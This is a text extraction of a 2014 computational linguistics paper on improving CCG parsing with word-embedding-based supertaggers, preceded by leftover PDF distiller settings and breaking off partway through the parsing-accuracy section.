/ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_snkm6xv4wzaolcpximorxj4j2m ---- Improved CCG Parsing with Semi-supervised Supertagging Mike Lewis School of Informatics University of Edinburgh Edinburgh, EH8 9AB, UK mike.lewis@ed.ac.uk Mark Steedman School of Informatics University of Edinburgh Edinburgh, EH8 9AB, UK steedman@inf.ed.ac.uk Abstract Current supervised parsers are limited by the size of their labelled training data, making improving them with unlabelled data an im- portant goal. We show how a state-of-the- art CCG parser can be enhanced, by pre- dicting lexical categories using unsupervised vector-space embeddings of words. The use of word embeddings enables our model to better generalize from the labelled data, and allows us to accurately assign lexical cate- gories without depending on a POS-tagger. Our approach leads to substantial improve- ments in dependency parsing results over the standard supervised CCG parser when evalu- ated on Wall Street Journal (0.8%), Wikipedia (1.8%) and biomedical (3.4%) text. We com- pare the performance of two recently proposed approaches for classification using a wide va- riety of word embeddings. We also give a de- tailed error analysis demonstrating where us- ing embeddings outperforms traditional fea- ture sets, and showing how including POS fea- tures can decrease accuracy. 1 Introduction Combinatory Categorial Grammar (CCG) is widely used in natural language semantics (Bos, 2008; Kwiatkowski et al., 2010; Krishnamurthy and Mitchell, 2012; Lewis and Steedman, 2013a; Lewis and Steedman, 2013b; Kwiatkowski et al., 2013), largely because of its direct linkage of syntax and semantics. However, this connection means that performance on semantic applications is highly de- pendent on the quality of the syntactic parse. Al- though CCG parsers perform at state-of-the-art lev- els (Rimell et al., 2009; Nivre et al., 2010), full- sentence accuracy is just 25.6% on Wikipedia text, which gives a low upper bound on logical inference approaches to question-answering and textual entail- ment. Supertags are rich lexical categories that go be- yond POS tags by encoding information about predicate-argument structure. Supertagging is “al- most parsing”, and is used by parsers based on strongly lexicalized formalisms such as CCG and TAG to improve accuracy and efficiency, by dele- gating many of the parsing decisions to finite-state models (Bangalore and Joshi, 1999). A disadvan- tage of this approach is that larger sets of lexical categories mean increased sparsity, decreasing tag- ging accuracy. As large amounts of labelled data are unlikely to be made available, recent work has ex- plored using unlabelled data to improve parser lex- icons (Thomforde and Steedman, 2011; Deoskar et al., 2011; Deoskar et al., 2014). However, existing work has failed to improve the overall accuracy of state-of-the-art supervised parsers in-domain. Another strand of recent work has explored us- ing unsupervised word embeddings as features in supervised models (Turian et al., 2010; Collobert et al., 2011b), largely motivated as a simpler and more general alternative to standard feature sets. We apply similar techniques to CCG supertagging, hypothe- sising that words which are close in the embedding space will have similar supertags. Most existing work has focused on flat tagging tasks, and has not produced state-of-the-art results on structured pre- diction tasks like parsing (Collobert, 2011; Andreas and Klein, 2014). CCG’s lexicalized nature provides a simple and elegant solution to treating parsing as a flat tagging task, as the lexical categories encode information about hierarchical structure. 327 Transactions of the Association for Computational Linguistics, 2 (2014) 327–338. Action Editor: Ryan McDonald. Submitted 4/2014; Revised 6/2014; Published 10/2014. c©2014 Association for Computational Linguistics. As well as improving parsing accuracy, our model has a number of advantages over current CCG pars- ing work. Our supertagger does not make use of a POS-tagger, a fact which simplifies the model archi- tecture, reduces the number of parameters, and elim- inates errors caused by a pipeline approach. Also, learning word embeddings is an active area of re- search, and future developments may directly lead to better parsing accuracy, with no change required to our model. 2 Background 2.1 CCG Parsing The widely-used C&C parser (Clark and Curran, 2007) for CCG takes a pipeline approach, where first sentences are POS-tagged, then supertagged, and then parsed. The supertagger outputs a distri- bution over tags for each word, and a beam is used to aggressively prune supertags to reduce the parser search space. If the parser is unable to find a parse with a given set of supertags, the beam is relaxed. This approach is known as adaptive supertagging. The pipeline approach has two major drawbacks. Firstly, the use of a POS-tagger can overly prune the search space for the supertagger. Whilst POS- taggers have an accuracy of around 97% in domain, this drops to just 93.4% on biomedical text (Rimell and Clark, 2009), meaning that most sentences will contain an erroneous POS-tag. The supertag- ger model is overly dependent on POS-features—in Section 4.6 we show that supertagger performance drops dramatically on words which have been as- signed an incorrect POS-tag. Secondly, both the POS-tagger and supertagger are highly reliant on lexical features, meaning that performance drops both on unknown words, and words used differently from the training data. Many common words do not appear at all in the train- ing data of the Penn Treebank, such as ten, mili- tants, insight, and teenager. Many others are not seen with all their possible uses—for example Eu- ropean only occurs as an adjective, never a noun, meaning that the C&C parser is unable to analyse simple sentences like The director of the IMF is tra- ditionally a European. These problems are particu- larly acute when parsing other domains (Rimell and Clark, 2009). 2.2 Semi Supervised NLP using Word Embeddings Recent work has explored using vector space em- beddings for words as features in supervised mod- els for a variety of tasks, such as POS-tagging, chunking, named-entity recognition, semantic role labelling, and phrase structure parsing (Turian et al., 2010; Collobert et al., 2011b; Collobert, 2011; Socher et al., 2013). The major motivation for us- ing these techniques has been to minimize the level of task-specific feature engineering required, as the same feature set can lead to good results on a variety of tasks. Performance varies between tasks, but any gains over state-of-the-art traditional features have been small. A variety of techniques have been used for learning such embeddings from large unlabelled corpora, such as neural-network language models. 3 Models We introduce models for predicting CCG lexi- cal categories based on vector-space embeddings. The models can then be used to replace the POS- tagging and supertagging stages used by existing CCG parsers. We experiment with the neural net- work model proposed by Collobert et al. (2011b), and conditional random field (CRF) model used by Turian et al. (2010). We only use features that can be expected to work well out-of-domain—in particular, we use no lexical or POS features. 3.1 Features Our features are similar to those used by Collobert et al. (2011b) for POS-tagging. For every word in a context window, we add features for the embedding of the word, its 2-character suffix, and whether or not it is capitalised. We expect such features to gen- eralize well to other domains—and in Section 4.5 we show that adding traditional POS-tag and lexical features does not help. To further reduce sparsity, we apply some simple preprocessing techniques. Words are lower-cased1, and all digits are replaced with 0. If an unknown word is hyphenated, we first try backing-off to the substring after the hyphen. 1For embeddings that include separate entries for the same word with different capitalization, we take the most frequently occur- ring version in the unlabelled corpus. 328 Colourless green ideas NP S\NP N Context Words Lookup Tables for Embeddings and Discrete Features Additional Hidden Layer Output CCG Categories Figure 1: Collobert et al. (2011b)’s Window approach network, applied to CCG supertagging. Each context word Ci is connected to one hidden node per dimension of the embedding Eij with weight Wij, and ad- ditional hidden nodes representing capitalization and suffix features. The weights Wij are initialized using pre-trained word embeddings, but can be modified during supervised training. The additional hidden layer uses a hard-tanh activation function, and the output layer uses a softmax activation function. Words which do not have an entry in the word em- beddings share an ‘unknown’ embedding. Different ‘unknown’ vectors are used for capitalized and un- capitalized words, and non-alphabetic symbols. We also add entries for context words which are before the start and after the end of the sentence. All of these were initialized to the ‘unknown’ vector in the pre-trained embeddings (or with Gaussian noise if not available). 3.2 Neural Network Model We predict word supertags with the neural network classifier used by Collobert et al. (2011b) for POS- tagging, as shown in Figure 1. Each feature is imple- mented as a lookup table, which maps context words onto vectors. The same lookup table parameters are used wherever a word appears in the context win- dow. Word embeddings are implemented with a lookup table W ∈ RV ×D, where V is the size of the vo- cabulary, and D is the dimension of the word em- beddings. The parameters of the lookup table are initialized using unsupervised embeddings, but are modified during supervised training. As in Collobert et al. (2011b), non-embedding features (2-character suffixes and capitalization) are also each represented with lookup tables, which map each feature onto a K dimensional vector (as in Col- lobert et al. (2011b), we use K = 5). Lookup table parameters for non-embeddings features are initial- ized with Gaussian noise. The first hidden layer therefore contains C×(D+ KF) nodes, where F is the number of discrete fea- tures and C is the size of the context window. We also experimented adding an additional hidden layer, with a hard-tanh activation function, which makes the classifier non-linear. Finally, a logistic softmax layer is used for classifying output categories. The model is trained using stochastic gradient de- scent, with a learning rate of 0.01, optimizing for cross-entropy. We use early-stopping as an alterna- tive to regularization—after each iteration the model is evaluated for accuracy on held-out data, and we use the best performing model. Training was run until performance decreased on held-out data. 3.3 CRF Model The neural network model treats the probability of each supertag as being conditionally independent. However, conditioning on surrounding supertags 329 Embeddings Model Dimensionality Training Words Training Domain Collobert&Weston NNLM 50 660M Wikipedia Skip-Gram Skip Gram 300 100B Google News Turian NNLM 25, 50, 100, 200 37M Newswire HLBL HLBL 50, 100 37M Newswire Mikolov RNNLM 80, 640 320M Broadcast News Table 1: Embeddings used in our experiments. Dimensionality is the set of dimensions of the word em- bedding space that we experimented with, and Training Words refers to the size of the unlabelled corpus the embeddings were trained on. may be very useful—for example, a noun is much more likely to follow an adjective than a verb. Cur- ran et al. (2006) report a large improvement using a maximum-entropy Markov model for supertagging, conditioned on the surrounding supertags. We follow Turian et al. (2010) in using a linear chain CRF model for sequence classification using embeddings as features. This model does not al- low supervised training to fine-tune the embeddings, though it would be possible to build a CRF/NN hy- brid that enabled this. We use the same feature set as with the neural network model—so the probabil- ity of a category depends on embeddings, capital- ization and suffix features—as well as the previous category. The model is trained using the averaged- perceptron algorithm (Collins, 2002), again using early-stopping based on development data accuracy. 4 Experiments 4.1 Domains We experiment with three domains: • CCGBank (Hockenmaier and Steedman, 2007), which is a conversion of the Penn Tree- bank (Marcus et al., 1993) to CCG. Section 23 is used for evaluation. • Wikipedia, using the corpus of 200 sentences annotated with CCG derivations by Honnibal et al. (2009). As the text is out-of-domain, parsing accuracy drops substantially on this corpus. • Biomedical text, which is even less related to the newswire text than Wikipedia, due to large numbers of unseen words and different writ- ing styles, causing low parsing accuracy. For parsing experiments, we use the Bioinfer cor- pus (Pyysalo et al., 2007) as a test set. For measuring supertagging accuracy, we use the CCG annotation produced by Rimell and Clark (2008). 4.2 Neural Network Model Parameters In this section, we explore how adjusting the pa- rameters of our neural network model2 affects 1-best lexical category accuracy on the Section 00 of CCG- Bank (all development was done on this data). The C&C supertagger achieves 91.5% accuracy on this task. The models were trained on Sections 02-21 of CCGBank, and the reported numbers are the best accuracy achieved on Section 00. As in Clark and Curran (2007), all models use only the 425 most fre- quent categories in CCGBank. 4.2.1 Embeddings A number of word embeddings have recently been released, aiming to capture a variety of syntactic and semantic phenomena, based on neural network lan- guage models (NNLMs) (Turian et al., 2010; Col- lobert et al., 2011b), recurrent neural network lan- guage models (Mikolov, 2012), the hierarchical log bilinear model (HLBL) (Mnih and Hinton, 2008), and Mikolov et al. (2013)’s Skip Gram model. How- ever, there has been a lack of experiments comparing which embeddings provide the most effective fea- tures for downstream tasks. First, we investigated the performance of several publicly available embeddings, to find which was most effective for supertagging. The embeddings we used are summarized in Table 1. For efficiency, we used our simplest architecture, with no additional 2Implemented using the Torch7 library (Collobert et al., 2011a) 330 Embeddings Category Accuracy (window=5) Category Accuracy (window=7) Collobert&Weston 90.0% 89.6% Skip Gram 90.9% 91.0% Turian-25 91.0% 91.1% Turian-50 91.1% 91.3% Turian-100 91.0% 91.1% Turian-200 90.8% 90.7% HLBL-50 90.9% 91.2% HLBL-100 91.1% 91.3% Mikolov-80 87.2% 88.1% Mikolov-640 87.9% 88.4% Table 2: Comparison of different embeddings and context windows on Section 00 of CCGBank. Ab- breviations such as Turian-50 refer to the Turian em- beddings with a 50-dimensional embedding space. hidden layer. We also investigate which size context window is most effective. Results are shown in Table 2, and show that the choice of embeddings is crucial to performance on this task. The performance of the Turian and HLBL embeddings is surprisingly high given the relatively small amount of unlabelled data, suggesting that pa- rameters other than the size of the corpus are more important. Of course, we have not performed a grid- search of the parameter space, and it is possible that other embeddings would perform better with differ- ent training data, dimensionality, or model architec- tures. The Mikolov embeddings may suffer from be- ing trained on broadcast news, which has no punc- tuation and different language use. Using a context window of 7 words generally outperformed using a window of 5 words (we also experimented with a 9 word window, but found performance decreased slightly to 91.2% for the Turian-50 embeddings). There is no clear trend on the optimal dimension of the embedding space, and it is likely to vary with training methods and corpus size. Next, we experimented with the size of the addi- tional hidden layer—for efficiency, using the Turian- 50 embeddings with a 5-word context window. Re- sults are shown in Table 3, and suggest that a hid- den layer is not useful for this task—possibly due to over-fitting. Embeddings Additional Hidden Layer Size Accuracy Turian-50 0 91.1% Turian-50 100 90.9% Turian-50 300 90.6% Turian-50 500 90.9% Turian-50 1000 90.5% Table 3: Comparison of different model architec- tures, using the Turian embeddings and a 5-word context window. A size of 0 means no additional hidden layer was used. In all subsequent experiments we used a context window of 7 words, no additional hidden layer, and the Turian-50 embeddings. 4.3 CRF Model We also experimented with the CRF model for supertagging3. Training these models took far longer than our neural-network model, due to the need to use the forward-backward algorithm with a 425×425-dimensional transition matrix during training (rather than considering each word’s cate- gory independently). Consequently, we only exper- imented with the Turian-50 embeddings with a 7- word context window, which attained the best per- formance using the neural network. We found that using the Turian-50 embeddings gave a surprisingly weak performance of just 90.3% (compared to 91.3% for the neural network model). We hypothesised that one reason for this result could be that the model is unable to modify the embeddings during supervised training (in contrast to the neural-network model). Consequently, we built a new set of embeddings, using the weight- matrix learned by our best neural network model. A new CRF model was then trained using the tuned embeddings. Performance then improved dramati- cally to 91.5%, and slightly outperformed the neu- ral network—showing that while there is a small advantage to using sequence information, it is cru- cial to allow supervised training to modify the em- beddings. These results help explain why Collobert et al. (2011b)’s neural network models outperform Turian et al. (2010)’s sequence models—but greater 3Implemented using CRFSuite (Okazaki, ) 331 improvements may be possible with the combined approach we introduce here, which allows the model to both tune the embeddings and exploit sequence information. However, tagging with this model was considerably slower than the neural network (again, due to the cost of decoding), so we used the neural network architecture in the remaining experiments. 4.4 Multitagging Accuracy The C&C parser takes a set of supertags per word as input, which is used to prune the search space. If no parse is found, the sentence is supertagged again with a wider beam. The effectiveness of the pruning therefore depends on the accuracy of the supertagger at a given level of ambiguity. We experimented with the accuracy of different supertaggers at different levels of ambiguity. For the C&C supertagger, we vary the number of categories per word using the same back-off beam settings re- ported in Clark and Curran (2007). For our supertag- ger, we vary recall by adjusting the a variable-width beam, which removes tags whose probability is less than β times that of the most likely tag. Results are shown in Figure 2. The supertag- gers based on embeddings consistently match or out- perform the C&C supertagger at all levels of recall across all domains. While performance is similar with a small number of tags per word, our supertag- gers perform better with a more relaxed beam— perhaps representing cases which are challenging for the C&C model, such as POS-tag errors. 4.5 Parsing Accuracy We investigate whether our supertagger improves the performance of the C&C parser, by replacing the standard C&C supertagger with our model. This evaluation is somewhat indirect, as the parser does not make use of the supertagger probabilities for cat- egories, but instead simply uses it to prune the search space. However, we show that better pruning leads directly to better parsing accuracies. C&C parser results on CCGBank and Wikipedia are reported using Clark and Curran (2007)’s best performing hybrid model4 (trained on Sections 02- 21), with automatic POS-tags, and the parameters 4This model is not publicly available, so we re-trained it follow- ing the instructions at http://aclweb.org/aclwiki/ index.php?title=Training_the_C&C_Parser CCGBank Section 00 1 2 3 4 96 97 98 99 100 Average Categories Per Word O ra cl e C at eg or y A cc ur ac y (% ) C&C Turian-50 Wikipedia 1 2 3 4 94 96 98 100 Average Categories Per Word O ra cl e C at eg or y A cc ur ac y (% ) C&C Turian-50 Biomedical 1 2 3 4 5 92 94 96 98 100 Average Categories Per Word O ra cl e C at eg or y A cc ur ac y (% ) C&C Turian-50 Figure 2: Ambiguity vs. Accuracy for different su- pertaggers across different domains. Datapoints for the C&C parser use its standard back-off parameters. 332 Supertagger CCGBank Wikipedia Bioinfer F1 COV F1 F1 COV F1 F1 COV F1 (cov) (all) (cov) (all) (cov) (all) C&C 85.47 99.6 85.30 81.19 99.0 80.64 76.08 97.2 74.88 Honnibal et al. (2009) 85.19 99.8 - 81.75 99.4 - - - - Brown Clusters 85.27 99.9 85.21 80.89 100.0 80.89 76.06 100.0 76.06 Turian-50 Embeddings 86.11 100.0 86.11 82.30 100.0 82.30 78.41 99.8 78.28 Turian-50 + POS tags 85.62 99.9 85.55 81.77 100.0 81.77 77.05 100.0 77.05 Turian-50 + Frequent words 86.04 100.0 86.04 82.44 100.0 82.44 78.10 100.0 78.10 Table 4: Parsing F1-scores for labelled dependencies across a range of domains, using the C&C parser with different supertaggers. Embeddings models used a context window of 7 words, and no additional hidden layer. Following previous CCG parsing work, we report F1-scores on the subset of sentences where the parser is able to produce a parse (F1-cov), and the parser’s coverage (COV). Where available we also report overall scores (F1-all), including parser failures, which we believe gives a more realistic assessment. used in the published results. Biomedical results use the publicly available parsing model, setting the ‘parser beam ratio’ parameter to 10−4, which im- proved results on development data. To achieve full coverage on the Wikipedia corpus, we increased the ‘max supercats’ parameter to 107. C&C accuracies differ very slightly from previously reported results, due to differences in the retrained models. As in Clark and Curran (2007), we use a variable- width beam β that prunes categories whose prob- ability is less than β times that of the most likely category. For simplicity, our supertaggers use the same β back-off parameters as are used by the C&C parser, though it is possible that further improve- ments could be gained by carefully tuning these pa- rameters.5 In contrast to the C&C supertaggers, we do not make use a tag-dictionaries. Results are shown in Table 4, and our supertag- gers consistently lead to improvements over the baseline parser across all domains, with larger im- provements out-of-domain. Our best model also outperforms Honnibal et al. (2009)’s self-training approach to domain adaptation on Wikipedia (which lowers performance on CCGBank). Our results show that word embeddings are an ef- fective way of adding distributional information into CCG supertagging. A popular alternative approach 5We briefly experimented setting the β parameters to match the ambiguity of the C&C supertagger on Section 00 of CCGBank, which caused the F1-score using the Turian-50 embeddings to drop slightly from 86.11 to 85.95. for semi-supervised learning is to use Brown clus- ters (Brown et al., 1992). To ensure a fair com- parison with the Turian embeddings, we use clus- ters trained on the same corpus, and use a com- parable feature set (clusters, capitalization, and 2- character suffixes—all implemented as sparse bi- nary features). Brown clusters are hierarchical, and following Koo et al. (2008), we incorporate Brown clusters features at multiple levels of granularity— using 64 coarse clusters (loosely analogous to POS- tags) and 1000 fine-grained clusters. Results show slightly lower performance than C&C in domain, but higher performance out of domain. However, they are substantially lower than results using the Turian- 50 embeddings. We also experimented with adding traditional word and POS features, which were implemented as sparse vectors for each word in the context win- dow. We found that including POS features (de- rived from the C&C POS-tagger) reduced accuracy across all domains. One reason is that POS tags are highly discriminative features, therefore errors can be hard to recover from. Adding lexical features for the most frequent 250 words had little impact on re- sults, showing that the embeddings already represent this information. For infrequent words, the C&C parser uses a hard constraint that only certain POS-tag/supertag com- binations are allowed. This constraint means that the parser may be particularly vulnerable to POS- 333 Words with incorrect POS Tag (3%) 1 2 3 4 60 70 80 90 100 Average Categories Per Word O ra cl e C at eg or y A cc ur ac y (% ) C&C Turian-50 Figure 3: Ambiguity vs. Accuracy for different su- pertaggers, on words with incorrect POS tags. tag errors, as the model cannot override the hard- constraint. We therefore also ran the model allowing any 